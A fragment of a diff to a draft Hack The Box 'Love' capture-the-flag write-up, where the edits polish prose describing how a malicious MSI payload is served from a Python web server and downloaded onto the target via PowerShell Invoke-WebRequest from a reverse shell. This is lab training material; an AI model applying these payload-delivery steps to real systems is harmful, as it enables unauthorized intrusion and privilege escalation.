tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Love-Writeup.md

 @@@Final size of msi file: 159744 bytes@@@
 {% endhighlight %}

 The next step is to download this payload to the target and execute it.
-We start by starting a python web server by executing `python3 -m http.server 80`.
-Then, in our reverse shell, we start powershell by executing "powershell".
-We then run the [Invoke-WebRequest]() cmdlet with the -Uri and -OutFile flags to download our malicious MSI file.
-We use the -Uri flag to specify the URL of the malicious MSI file on our web server and the -OutFile flag to specify where the file should be written.
-Note that we write the file to the C:\Windows\temp directory since this is normally a location where all windows accounts have `Write` permissions.
+We start by initializating a Python web server by executing `python3 -m http.server 80`.
+Then, in our reverse shell, we start Powershell by executing `powershell`.
+We then run the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest) cmdlet with the `-Uri` and `-OutFile` flags to download our malicious MSI file.
+We use the `-Uri` flag to specify the URL of the malicious MSI file on our web server and the `-OutFile` flag to specify where the file should be written.
+Note that we write the file to the `C:\Windows\temp` directory since this is normally a location where all windows accounts have `Write` permissions.

 {% highlight none linenos %}
 C:\xampp\htdocs\omrs\images>@@powershell@@